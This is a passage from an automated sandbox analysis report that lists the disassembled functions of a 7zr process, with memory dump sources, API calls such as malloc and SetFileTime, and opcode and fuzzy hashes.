                            • Opcode Fuzzy Hash: ca35c46037ab7d339bb5c30c221c2fc331370032afd5aaf37518962630389b23
                            • Instruction Fuzzy Hash: 8F814D31A007069FDB64CF29C980A6AB7F6BF86318F144A2DE856C7A42D774FE41CB50
                            Function 00CA1E0C Relevance: 2.5, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 2436765578-0
                            • Opcode ID: 857d94e1f8e8be275c2a6556a44f9fa9dff3d92d781d707f77b65c846b741584
                            • Instruction ID: 1ba6bfd311b5a25a86c37986353b9b35de4f790a12a9627c0e939ae680af2e7c
                            • Opcode Fuzzy Hash: 857d94e1f8e8be275c2a6556a44f9fa9dff3d92d781d707f77b65c846b741584
                            • Instruction Fuzzy Hash: 90E0C23400438CAECF105FA0D8087983F689F023A9F04E015FC2C8E211C270C7D48760
                            Function 00CEB05D Relevance: 2.2, APIs: 1, Instructions: 653COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 746a79173352d779f195195b136a4f2da301ed20defb899985a97eecd199eb7b
                            • Instruction ID: f81bc08877dba4e932efe16f8da0895f0e865bf64ea2c16461ccf04ab518cf10
                            • Opcode Fuzzy Hash: 746a79173352d779f195195b136a4f2da301ed20defb899985a97eecd199eb7b
                            • Instruction Fuzzy Hash: FC52B130900289DFDF15CFA9C598BAEBBB5AF49304F28409DE815AB391CB75DE45CB21
                            Function 00CB6305 Relevance: 1.9, APIs: 1, Instructions: 377COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: ddd80d1ecd893698c4db7ad338a9f683683480913de1645d3b9ddea039f4b140
                            • Instruction ID: 5c1155d41f2aa18984d449ba9f22081d104f1d2c8b01205abba8168a17d11e99
                            • Opcode Fuzzy Hash: ddd80d1ecd893698c4db7ad338a9f683683480913de1645d3b9ddea039f4b140
                            • Instruction Fuzzy Hash: CEF19C71905785DFCF31CF64C490AEABBE1BF15304F58486EE4AA9B211DB34AE88CB51
                            Function 00CF10D3 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: dc9e36fc375d760161ba1f7c0416237cd91e0a35101bd379fbe596d21dbdb6f7
                            • Instruction ID: a79cd64e249b4485b5fd70b50d6ab5c7e9d81e0596e516e563193c25284483dc
                            • Opcode Fuzzy Hash: dc9e36fc375d760161ba1f7c0416237cd91e0a35101bd379fbe596d21dbdb6f7
                            • Instruction Fuzzy Hash: 6AD1AD70A04749EFDB64CFA5C880BEEBBF1BF48300F14452DEA6597661D770A944CB92
                            Function 00CECF91 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CECF96
                              • Part of subcall function 00CF1511: __EH_prolog.LIBCMT ref: 00CF1516
                              • Part of subcall function 00CF1511: _CxxThrowException.MSVCRT(?,00D5D480), ref: 00CF1561
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID:
                            • API String ID: 2366012087-0
                            • Opcode ID: 34da6ba8a50d0636ce3b3efbc859fb7f16525070e3053a66c257002334999d4b
                            • Instruction ID: feb2cb86d6c26943660e71e65864affe0c61550b7317b934a8346b69b3b7e316
                            • Opcode Fuzzy Hash: 34da6ba8a50d0636ce3b3efbc859fb7f16525070e3053a66c257002334999d4b
                            • Instruction Fuzzy Hash: 26515171900289DFCB11DFA9C8C8BAEBBB4BF49304F1844ADE85AD7242C7759E45DB21
                            Function 00CDF784 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 12febb144ff1b9e6b7603905eb7978d0a0f87cacd8409e82525900ce92459a6e
                            • Instruction ID: 0e9cfb7a42126be6a581a50b697cf6ab996d00f9563d94dba6740aa413c7cabd
                            • Opcode Fuzzy Hash: 12febb144ff1b9e6b7603905eb7978d0a0f87cacd8409e82525900ce92459a6e
                            • Instruction Fuzzy Hash: A2515D74A00606DFCB14CF64C8909BAFBB2FF4A304B14496ED6979B751D331AA06DF91
                            Function 00CEAD3A Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 6180403cab2185c4f866d7147a2c7716d5d0dfaa636b56e56158e720c69b4637
                            • Instruction ID: c313e9eaf2632382106e760317c03eab19afcd2a5b7bd4385657bf47d1a2b439
                            • Opcode Fuzzy Hash: 6180403cab2185c4f866d7147a2c7716d5d0dfaa636b56e56158e720c69b4637
                            • Instruction Fuzzy Hash: 4141A070A00786EFDB24CF56C884B6ABBB0BF44310F148A6DE46697691C370FE91CB51
                            Function 00CB4250 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB4255
                              • Part of subcall function 00CB440B: __EH_prolog.LIBCMT ref: 00CB4410
                              • Part of subcall function 00CA1E0C: malloc.MSVCRT ref: 00CA1E1F
                              • Part of subcall function 00CA1E0C: _CxxThrowException.MSVCRT(?,00D54B28), ref: 00CA1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 3744649731-0
                            • Opcode ID: 1eec7fc765826e966f36a2ca5535a0a847f824d32ba735d0bc06be7b6178b5c3
                            • Instruction ID: 6cf3c0852983315884b98f783381d0041aac0b0912d1d9ac591485222c521ef6
                            • Opcode Fuzzy Hash: 1eec7fc765826e966f36a2ca5535a0a847f824d32ba735d0bc06be7b6178b5c3
                            • Instruction Fuzzy Hash: 0451C4B0805788CFC725DF69C1846CAFBF0BF19304F5588AEC49A97752D7B0A648DB61
                            Function 00CCD0E1 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CCD0E6
                              • Part of subcall function 00CA1E0C: malloc.MSVCRT ref: 00CA1E1F
                              • Part of subcall function 00CA1E0C: _CxxThrowException.MSVCRT(?,00D54B28), ref: 00CA1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionH_prologThrowmalloc
                            • String ID:
                            • API String ID: 3978722251-0
                            • Opcode ID: 0364cce56d44279004819d6408548c7d1a986a3791ef9549d330d6da7ec4037f
                            • Instruction ID: 9878cb83400a8ea9c2bf0065e4449f9acebdffd623af72d8bc39f27cc6220a08
                            • Opcode Fuzzy Hash: 0364cce56d44279004819d6408548c7d1a986a3791ef9549d330d6da7ec4037f
                            • Instruction Fuzzy Hash: 2A41C771A002159FCB10DFA8C844BAEBBB4BF45324F1845ADE456E7281CB70DE41C7A1
                            Function 00CB7FC5 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB7FCA
                              • Part of subcall function 00CA950D: SysAllocStringLen.OLEAUT32(?,?), ref: 00CA952C
                              • Part of subcall function 00CA950D: _CxxThrowException.MSVCRT(?,00D555B8), ref: 00CA954A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AllocExceptionH_prologStringThrow
                            • String ID:
                            • API String ID: 1940201546-0
                            • Opcode ID: ff308258e6d86c566f184f0cf9a9d7f8620b41ce9f9d25ca16280ea1c036de0a
                            • Instruction ID: d1bb36c38480f4145ab25fecfcae8da3b685599ce1cc7bf31a47bd8e0e025aea
                            • Opcode Fuzzy Hash: ff308258e6d86c566f184f0cf9a9d7f8620b41ce9f9d25ca16280ea1c036de0a
                            • Instruction Fuzzy Hash: 3C31507282010A9ACF15BFA5E892DFE7778FF25394F44412AE022B7162DE359A0CD751
                            Function 00CDADB7 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CDADBC
                              • Part of subcall function 00CDAD29: __EH_prolog.LIBCMT ref: 00CDAD2E
                              • Part of subcall function 00CDAF2D: __EH_prolog.LIBCMT ref: 00CDAF32
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 107d949f7c341e2d9098fa9f7ea27348148fe633805f5124ac0d3b8bf36bb95c
                            • Instruction ID: 57f7c5eed6146c00e8f9efd1e8cc5fe3c9fa55ab89641e98aaea763d4ca8d5c9
                            • Opcode Fuzzy Hash: 107d949f7c341e2d9098fa9f7ea27348148fe633805f5124ac0d3b8bf36bb95c
                            • Instruction Fuzzy Hash: 3441BA7144ABC0DEC326DF7881656C6FFE06F26204F94C99EC4EA43B52D670A60CD766
                            Function 00CC062E Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: b763030d1fe9cc39696827a4d0742bdc12bf8587dc316b27f6df34c193d51131
                            • Instruction ID: de08fdb3e51d338489254ae0338312dff3e7add29a9bd2e8226f47bee9270037
                            • Opcode Fuzzy Hash: b763030d1fe9cc39696827a4d0742bdc12bf8587dc316b27f6df34c193d51131
                            • Instruction Fuzzy Hash: 9B31F6B0900609DBCB14EF95C891DAEFBB5FF94364B20811EE82667251C7309A01CBA0
                            Function 00CC98F2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC98F7
                              • Part of subcall function 00CC9987: __EH_prolog.LIBCMT ref: 00CC998C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 5d0faf52dfc75ca3e2f64d6625a08807a88bc213cad9dcc4c8ba9bbb2c495fea
                            • Instruction ID: 56753fb0e7d6a11e5fb42c5c28e1f8323e72a86dd4db728c1bdf2a788a3d9b95
                            • Opcode Fuzzy Hash: 5d0faf52dfc75ca3e2f64d6625a08807a88bc213cad9dcc4c8ba9bbb2c495fea
                            • Instruction Fuzzy Hash: 80114C356002459FDB14CF59C888FAAB3A9FF89350F14855CE86ADB261CB31E900CB60
                            Function 00CC021A Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC021F
                              • Part of subcall function 00CB3D66: __EH_prolog.LIBCMT ref: 00CB3D6B
                              • Part of subcall function 00CB3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3D7D
                              • Part of subcall function 00CB3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3D94
                              • Part of subcall function 00CB3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00CB3DB6
                              • Part of subcall function 00CB3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3DCB
                              • Part of subcall function 00CB3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3DD5
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID:
                            • API String ID: 1532160333-0
                            • Opcode ID: 1877243254b1bc9f2b5f45ce437ba92a2fb71c7e7fdfd6bc01cb604a66689072
                            • Instruction ID: 9a7942aa6391c1b81d235d7f99982c45765f7b3edec5296490024489c83d6d61
                            • Opcode Fuzzy Hash: 1877243254b1bc9f2b5f45ce437ba92a2fb71c7e7fdfd6bc01cb604a66689072
                            • Instruction Fuzzy Hash: DD214AB1946B90CFC321CF6B82D0686FFF4BB19600B94996EC0DA83B12C770A508CF65
                            Function 00CC1C6F Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC1C74
                              • Part of subcall function 00CA6C72: __EH_prolog.LIBCMT ref: 00CA6C77
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 3db85716af8d50012b97ce55df72c279fbe02dcedeb014e538474e9c6afda940
                            • Instruction ID: 518b005d5bb72c5642e9dafc8d181d3aece6a90c5be57c2a7a5e216b117d7e09
                            • Opcode Fuzzy Hash: 3db85716af8d50012b97ce55df72c279fbe02dcedeb014e538474e9c6afda940
                            • Instruction Fuzzy Hash: 4C11AD319002159BCF19FBE5D952BEDBB75AF16358F08002CFC4263293DB615E4AD6A0
                            Function 00CB7E5A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB7E5F
                              • Part of subcall function 00CA6C72: __EH_prolog.LIBCMT ref: 00CA6C77
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                              • Part of subcall function 00CA757D: GetLastError.KERNEL32(00CAD14C), ref: 00CA757D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ErrorLastfree
                            • String ID:
                            • API String ID: 683690243-0
                            • Opcode ID: dbeddd850bf5080c5d131d29ad5ab038b7fa2d1ccb498120ac7f69dc226b8cfe
                            • Instruction ID: ca0becdde13292c59db2a576ebc4f9086fce6417443cd4c1b5a1f4972ac2bd09
                            • Opcode Fuzzy Hash: dbeddd850bf5080c5d131d29ad5ab038b7fa2d1ccb498120ac7f69dc226b8cfe
                            • Instruction Fuzzy Hash: 2701F976A457509FC721EF79D8929DFBBB1EF46310F00462EE883536A2CB34A90DDA50
                            Function 00CEBF8C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CEBF91
                              • Part of subcall function 00CED144: __EH_prolog.LIBCMT ref: 00CED149
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: 70688a8730afda607392f9e2650a0f7be8a8fcd02186fb666cc773d629ff0066
                            • Instruction ID: 55a0142c31179875fa3fd7da86102cd09def9bdc0d23b21d399b40dbbcc46e66
                            • Opcode Fuzzy Hash: 70688a8730afda607392f9e2650a0f7be8a8fcd02186fb666cc773d629ff0066
                            • Instruction Fuzzy Hash: 1A115E75800755DFCB24EF65C945BCABBF4BF01348F008A1CE8A693691D7B1AA08DB90
                            Function 00CEBDB5 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CEBDBA
                              • Part of subcall function 00CEBE69: __EH_prolog.LIBCMT ref: 00CEBE6E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: e0fba9fbf77f5bda2a72d88c921d402cf459ceca581caabab07ea099ef068c8e
                            • Instruction ID: 1cef7e5774adf1de58b100a1224949c7b6a14031f70407d4797701613865f7e5
                            • Opcode Fuzzy Hash: e0fba9fbf77f5bda2a72d88c921d402cf459ceca581caabab07ea099ef068c8e
                            • Instruction Fuzzy Hash: 521116B5940744DFC720CF69C088686FBE0FF18304F50C96ED8AA47712C3B0A948CB60
                            Function 00CA7AB2 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                            Download Yara Rule
                            APIs
                            • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00CA1AD1,00000000,00000002,00000002,?,00CA7B3E,?,00000000), ref: 00CA7AFD
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: FileTime
                            • String ID:
                            • API String ID: 1425588814-0
                            • Opcode ID: aa8ab301ab5d14ba1bc8a1a949ed206722f940741c447a403803b68e92fd92a6
                            • Instruction ID: 4286716633cd9d23877faa4be000a2e932e23cbaf4f0ca955f9247ebd29f185e
